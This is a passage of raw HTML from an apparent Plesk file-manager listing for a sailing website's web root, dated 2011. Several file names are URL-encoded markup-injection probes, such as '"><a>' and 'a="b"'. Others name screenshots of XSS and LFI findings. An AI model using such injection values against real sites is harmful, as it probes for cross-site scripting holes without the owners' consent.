onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%20c23f52e7ba1" value="%20a%3db%20c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%2520c23f52e7ba1" onClick="return bin();;lon();">%20a%3db%20c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%20c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%2520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_064a7066601" value="064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=064a7066601" onClick="return bin();;lon();">064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPG" value="1-lfi-mod.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();">1-lfi-mod.JPG</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPGfdf080d99066333a3eca3950" value="1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="return bin();;lon();">1-lfi-mod.JPGfdf080d99066333a3eca3950</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1dac1%2522a%253d%2522b%2522064a7066601" value="1dac1%2522a%253d%2522b%2522064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick="return bin();;lon();">1dac1%2522a%253d%2522b%2522064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/1dac1%2522a%253d%2522b%2522064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_25e31e30568" value="25e31e30568" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=25e31e30568" onClick="return bin();;lon();">25e31e30568</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/25e31e30568" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=25e31e30568" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F25e31e30568" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=25e31e30568" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2a790%253ca%253e05dd7ec7ca9" value="2a790%253ca%253e05dd7ec7ca9" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick="return bin();;lon();">2a790%253ca%253e05dd7ec7ca9</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/2a790%253ca%253e05dd7ec7ca9" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2ef80%2522%2520a%253db%2520c23f52e7ba1" value="2ef80%2522%2520a%253db%2520c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick="return bin();;lon();">2ef80%2522%2520a%253db%2520c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/2ef80%2522%2520a%253db%2520c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpg" value="302br.net-xss-2.jpg" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();">302br.net-xss-2.jpg</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpg" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpg" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" value="302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="return bin();;lon();">302br.net-xss-2.jpgfdf080d93392bd957db5b4d5</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3e50b%2522%253e%253ca%253e8f0ee00628" value="3e50b%2522%253e%253ca%253e8f0ee00628" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick="return bin();;lon();">3e50b%2522%253e%253ca%253e8f0ee00628</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/3e50b%2522%253e%253ca%253e8f0ee00628" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPG" value="3M.COM-XSS-1.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();">3M.COM-XSS-1.JPG</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPGfdf080d921773c427dce8684" value="3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="return bin();;lon();">3M.COM-XSS-1.JPGfdf080d921773c427dce8684</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" 